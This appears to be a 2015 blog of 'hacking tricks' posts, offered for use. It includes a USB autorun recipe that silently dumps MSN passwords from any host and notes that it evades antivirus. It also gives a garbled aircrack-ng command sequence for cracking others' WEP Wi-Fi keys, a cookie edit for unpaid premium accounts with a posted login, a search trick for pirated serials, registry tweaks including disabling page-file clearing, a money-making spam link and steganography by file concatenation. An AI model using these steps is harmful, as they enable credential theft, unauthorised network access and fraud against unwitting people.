Sunday, 6 December 2015

Shutdown Your System Faster with these Simple tweaks Tutorials

Is your system shutting down too slow ? With a few registry tweaks the system can be shut down far morefaster.Check  these registry tweaks for faster System Shutdown.The results are quite impressive
Autoend all tasks and Programs during Shutdown
1.From the Start Menu click Run and type “regedit”.(without quotes).
2.Navigate to HKEY_CURRENT_USER > Control Panel > Desktop.
3.Right Click on the Registry key “Autoend tasks “and select Modify.Change the value to 1.
Autoend tasks

Change the Application Hang Time

1.Open the registry editor by typing “regedit”(without quotes) in the run box from the Start Menu.
2.Navigate to HKEY_CURRENT_USER > Control Panel > Desktop.
3.There you will find a lot of registry keys.Find WaitToKillAppHangAppTime in the right hand pane.The default values are 20000 and 5000 respectively.Change them to 1000.( To change the value right click and select modify).

Disable Clearing of the paging File

When you shutdown your system Windows automatically clears the paging files( temporary files which may contain useful information) for security reasons.If you want not to clear the paging files everytime you shutdown you can save some seconds.
1.As usual,open the registry editor and navigate to
HKEY_LOCAL_MACHINE > SYSTEM > Current ControlSet > Control > Session Manager > Memory Management.
2.You will find a registry key on the right hand pane named ClearPageFileOnShutdown.Right click it and select modify.Set the value to 0.

Get The Msn Password From Usb Stick

>The first thing you need is an U3 USB-Stick. ( this are usb sticks which support the auto start function ) 
>Then you download mspass here click here
>You open your USB stick and make a new text document which is called Autostart. this is what you write into this file:
---------------------------------
[Autostart]
open=launch.bat
ACTION = myusbstick
---------------------------------
( After writing this you have to save the file as "Autostart.inf", "myusbstick" is of course the name of your usb stick :D )


>Then you make a folder called mspass, in this folder you copy the downloaded mspass.exe

>Then you make a .bat file which is named launch.bat
in this file you write
---------------------------------
start mspass\mspass.exe /stext mspass.txt
---------------------------------

OK this is all you have to do. the trick with the folder and the launch.bat is, that the antivirus programs don't detect them so fast.
when everything is ok, it should work like that:

You put the usb stick into any computer, the autostart.inf will launch the mspass. After a few seconds you can remove the usb stick, and there will be a new .txt file in which the msn password is written.


Use Google to get almost any software's serial no

    Use Google to get Serial No of any Software

Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....

But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....

So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss

Just follow the steps as instructed below

  • Go to Google
  • type this syntax in search bar " 94FBR"
  • Replace Product name with desired software and leave a space then type 94FBR
  • Press enter, thats it

Now you receive Many pages which contains Serial no, Crack, Patches....

Just make a try, this simple trick works for many people. :)

How to use cookie to get access to premium account

You need Mozilla firefox before you can do this cookie edit.

Step 1. Start firefox
Step 2. Go to Tools

Step 3. There go to Add-ons
[Image: 40011749.png]
Step 4. In Add-ons press Get Add-ons
[Image: 34644398.png]

Step 5. Search for "cookie"[Image: 77053296.png]

Step 6. Install the one named "Edit Cookies" and restart firefox
[Image: 80865331.png]

Step 7. Then go to filehost site you want to login as premium
[Image: 3570373.png]

Step 8. Login with non premium account. For example on megaupload you can use this Username: kenedaa Password: siavonen
[Image: 65003151.png]

Step 9. Go to tools again and select "Edit cookie" from bottom

[Image: 30351787.png]

Step 10. When you open it there is empty box put in there "megaupload" then press Filter/refresh button
[Image: 43102575.png]

Step 11. In there you should see cookie named "user" click on it and then click on button "edit"
[Image: 88457044.png]

Step 12. Then there should pop-up "add/edit cookie" window. Fill in there the content you have been given
[Image: 65832494.png]

Step 13. Then just Press "save". Close cookie editor


Step 14. Refresh the site and there it is premium account ^^

If it does not work for you just PM me or Comment ^^

Wednesday, 2 December 2015

Best Ways To Earn Money Online - without Investing

Best Ways To Earn Money Online - without Investing
http://get-rupee.com/
Earn Money Online without investment or Registration fees - Join with Get Rupee to increase your income Online
how to make extra money, how to make quick money, earn money online without investment

Wednesday, 18 November 2015

This tutorial will explain that how to crack wep key using Backtrack..!!


Step 1:-
First Download Backtrack 

Step 2:-
Burn the iso image on CD and boot your laptop from CD drive

Step 3:-
Select the third boot option(VESA/KDE).

Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a 
"Konsole" window.

Step 5:-
Type the following command
airmon-ng
Note down the interface name. In this example wifi0

Step 6:-
airmon-ng stop wifi0

Step 7:-
ifconfig wifi0 down

Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0

Step 9:-
airmon-ng start wifi0

Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier. 
If not than don’t worry we will still crack it.

Step 11:-
airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole

Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.

Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing or still 0 
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this console as it is and start new k

Step 14:-
aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.

Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.

Done..!!

Friday, 13 November 2015

HOW TO HIDE SECRET FILE IN IMAGE



Hello friends. Today we learn about other tricks of steganography. In past we learn about how to hide text in notepad. Now we learn about how to hide confidential file in image?

Requirement
Command prompt.

Before begin, I have one secret file named : secret.pdf, I do not want other people know about this file and also a picture named : apple.jpg. All of that files I put on my personal folder named pictures.

  1. open command prompt.
  2. Now change directory to picture folder through command prompt.
  3. Now compress your secret file(secret.pdf) using winrar.
  4. Next we use command prompt. type following code
    copy /b [image_filename].jpg + [rar_filename].rar nkd.jpg
    for our example code becomes
    copy /b apple.jpg + secret.rar nkd.jpg
    here nkd.jpg is our newfile which contain hidden document.
  5. Go your picture folder , you can see nkd.jpg.
  6. Now to view original file ,nothing too do just open file with winrar or you can also change extention from jpg to rar.